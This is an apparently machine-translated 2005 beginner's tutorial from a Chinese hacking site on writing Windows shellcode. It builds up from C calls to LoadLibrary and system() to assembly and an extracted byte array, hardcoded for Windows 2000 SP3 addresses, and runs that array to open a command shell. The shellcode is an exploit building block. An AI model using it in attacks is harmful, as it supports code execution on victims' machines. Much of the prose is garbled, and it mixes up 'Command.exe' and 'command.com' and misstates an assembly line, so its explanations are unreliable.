Create Windows own ShellCode-exploit warning-the black bar safety net

ID MYHACK58:6220054601
Type myhack58
Reporter 佚名
Modified 2005-11-17T00:00:00


In order to help beginners to understand the ShellCode to write, and can step by step get your own ShellCode, so the Windows ShellCode writing process for a detailed description, in order to facilitate as I like the rookie, the final to be able to write a simple but a real ShellCode; and further advanced ShellCode writing, will also in a series of later articles in a step-by-step demo, I hope you will find that the Exp is really good, the ShellCode the most wonderful!

ShellCode introduction and preparation steps

From the previous article and others of the attack code can be known, the ShellCode is“\xFF\x3A\x45\x72......” The form appears in the program, and Exploit the structure that is trying to make the computer can be transferred to our ShellCode up to go to implementation“\xFF\x3A\x45\x72......”-- Thus seen, the ShellCode is Exploit to attack the real dominate, just as lone is our article dominate. While the ShellCode.“\xFF\x3A\x45\x72......” Those values, actually is a machine code form, and General program in the memory inside the memory of the East is no different, attack the program memory inside thedatato dynamically change the ShellCode, and then jump over the implementation, just as implementation of a in the memory of the General program of the same, but the completion of our function, overflow attack is implemented.

Here you can define: the ShellCode is a program of machine code form, and the ShellCode of the writing process, is to give we want to program the machine code of the process.

Of course, ShellCode and Windows function call characteristics, decide the and a General exchangeof programmingsequence is different. So the preparation steps should be,

1. The concept ShellCode function; 2. With C language to verify implementation; 3. According to the C language, into with ShellCode characteristics of the compilation; and 4. Finally get the machine code in the form of ShellCode is. One of the most important is the third step-changed to have ShellCode features of the series, will be in the back of the article said.

The first step is the concept of ShellCode functionality. We want to feature may be implanted Trojans, kill the firewall, the reflux time, the power of electromagnetic waves to find aliens, and so on, WTF: the cough......that But the most basic of functions, or want to open a DOS window, then we can be in a DOS window to do a lot of things, so the first description open DOS Windows ShellCode writing.

C language code For example, the following program can be completed open a DOS window functions, we detailed look at the betting interpretation: the



typedef void (*MYPROC)(LPTSTR); //define a function pointer int main() { HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle = LoadLibrary(“msvcrt.dll”); ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System"); //find the System function address (ProcAdd) (""); //actually execute System(“”) return 0; }

In fact, the execution System(“”)can also be done open a DOS window functions, written in so complicated a reason, to explain the program: first Typedef void (*MYPROC)(LPTSTR)is to define a function pointer type, The type of the function parameter is String, the return value is empty. Then define MYPROC ProcAdd, so that ProcAdd to point to the parameter to be a string, the return value is a null function pointer; using LoadLibrary(“msvcrt.dll”);装载 动态链接库 msvcrt.dll; the re-use ProcAdd = (MYPROC) GetProcAddress(LibHandle, System)to obtain the System real address and is assigned to ProcAdd, after ProcAdd in the memory is System The address of the function, and later use this address to call the System function; and finally(ProcAdd) ("")is to call System(""), you can get a DOS window. In the window we can execute the Dir, Copy, etc. commands. As shown in Figure 1.


Figure 1

Get the address of the function

Program using GetProcAddress function to get System's real address, but the address is exactly how much, and how to view?

In VC, we Press F10 to enter debug state, and then in the Debug toolbar the midpoint of the last button Disassemble and fourth button Registers, so that the emergence of the source program Assembly code and the register state window, as shown in Figure 2


Figure 2

Continue to Press F10 until to the ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System")statements under the Cll dword ptr [__imp__GetProcAddress@8 (0 0 4 2 4 1 9 4)]After the execution, the EAX register becomes 7801AFC3, the description in my machine on the System( )function address is 0x7801AFC3 it. As shown in Figure 3.


Figure 3

WTF: Note This test the reader's machine is Windows 2 0 0 0 SP3, different environments may address different.

Why EAX is the System( )function address? That's because the execution of the function's return value, in the compilation of the following is usually placed in the EAX register, which can be considered a computer system agreed to it, so GetProcAddress(”System”)return value of the System function's address in EAX, for 0x7801AFC3 it.

Under Windows the function calls principle

Why bother to give the System The address of the function? This is because under Windows, the function call method is the first parameter from right to left onto the stack, and then Call the function address. Such as the implementation of function Fun(argv1, argv2, the first parameter from right to left onto the stack, here is the turn argv2, the argv1 pushed onto the stack, then Call Fun function of the address. Here's the Call to Fun function address, in fact, equal to two steps, one is to save the current EIP, the second is to jump to the Func the address of a function to perform, namely Push EIP + a Jmp Fun. The process is as follows shown in Figure 4.


Figure 4

Similarly, we want to execute System(""): the first argument into the stack, there is only one parameter, so put the Command. com address pushed onto the stack, note that is a Command. com string address; then Call the System function's address, and completes the execution. As shown in Figure 5.


Figure 5

Constructed with ShellCode features a compilation of

Understand the Windows function of the implementation principle, we want to execute System(“Command.exe”), it is necessary to first put Command. exe string of the address into the stack, but the Command. exe string? Memory may not, but we can construct it!

We put the‘Command.exe’a character a character is assigned to the stack, so‘Command.exe’the string will have, and the stack pointer ESP is just a Command. exe string of the address, we Push esp, on completion of the parameter-Command. exe string of the address into the stack. As shown in Figure 6.


Figure 6

Parameters into the stack, then the Call System function of the address. Just have to see, in Windows 2 0 0 0 SP3 on the System of the address of the function to 0x7801AFC3, so Call 0x7801AFC3 on the line. Put the ideas together, you can write out execution System(“Command.exe”)with the ShellCode characteristics of the Assembly code is as follows.

mov esp,ebp ; push ebp ; mov ebp,esp ; put current esp is assigned to ebp xor edi,edi ; push edi ;pressed into 0, esp-4,; role is to construct the end of the string\0 character. sub esp,08h ;plus above, a total of 1 to 2 bytes,;used to put"" it. mov byte ptr [ebp-0ch],63h ; c mov byte ptr [ebp-0bh],6fh ; o mov byte ptr [ebp-0ah],6dh ; m mov byte ptr [ebp-09h],6Dh ; m mov byte ptr [ebp-08h],61h ; a mov byte ptr [ebp-07h],6eh ; n mov byte ptr [ebp-06h],64h ; d mov byte ptr [ebp-05h],2Eh ; . mov byte ptr [ebp-04h],63h ; c mov byte ptr [ebp-03h],6fh ; o mov byte ptr [ebp-02h],6dh ; m a generationString"". lea eax,[ebp-0ch] ; push eax ; command. com string address as a parameter into the stack mov eax, 0x7801AFC3 ; call eax ; call the System function's address

Understand the principles and then see to achieve that is not clear to a lot?

To extract the ShellCode

First to verify, in VC you can use the__asm keyword to insert Assembly, we put the System(“Command.exe”)we write a compilation of alternative, LoadLibrary first stationary, and then execution, success! The pop-up that we want the DOS window. As shown in Figure 7.


Figure 7

By the same token, LoadLibrary(“msvcrt.dll”)also modeled the above into assembler, note that the LoadLibrary in Windows 2 0 0 0 SP3 on the address for 0x77e69f64 it. The two compilations together, will it compile, link, execute, and succeed! As shown in Figure 8.


Figure 8

With the above work, extract the ShellCode on the only remaining physical life. We The just full compilation of the program, Press F10 to enter Debug, and then press the Debug toolbar Disassembly button, right click on the pop-up menu, select Code Bytes, it appeared the compilation of the corresponding machine code. Because compilation can be fully accomplish our function, so we put a compilation of the corresponding machine code intact copy down, you get we want the ShellCode. The extracted ShellCode is as follows.

unsigned char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6" "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" "\x64\x9f\xE6\x77" //sp3 loadlibrary address 0x77e69f64 "\x52\x8D\x45\xF4\x50" "\xFF\x55\xF0" "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E" "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4" "\x50\xB8" "\xc3\xaf\x01\x78" //sp3 System address 0x7801afc3 "\xFF\xD0";

Verify ShellCode

Finally, to verify that the extracted ShellCode can complete our function. In the previous article has told you the method, you'll need to create a project and c source file, and then put the ShellCode part of the copy down, stored as an array, and finally in the main add on( (void(*)(void)) &shellcode) (), as follows:

unsigned char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6" "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" "\x64\x9f\xE6\x77" //sp3 loadlibrary address 0x77e69f64 "\x52\x8D\x45\xF4\x50" "\xFF\x55\xF0" "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E" "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4" "\x50\xB8" "\xc3\xaf\x01\x78" //sp3 System address 0x7801afc3 "\xFF\xD0"; int main() { ( (void(*)(void)) &shellcode )() return 0; }

( (void(*)(void)) &shellcode )()this sentence is the key, it put the ShellCode is converted into a parameter is empty, returns a null function pointer and call it. Execution of that sentence is equivalent to the execution of ShellCode array of thosedata. If the ShellCode is correct, it will complete our desired function, the emergence of a DOS window. We personally prepared the first ShellCode successfully completed!


This ShellCode's functionality is still relatively thin, but versatility is also to be further studied, but is indeed a By we personally build out the ShellCode, and the reality of the ShellCode is written out. As long as we mastered the basic method, later on may be in the vast space of freedom soar!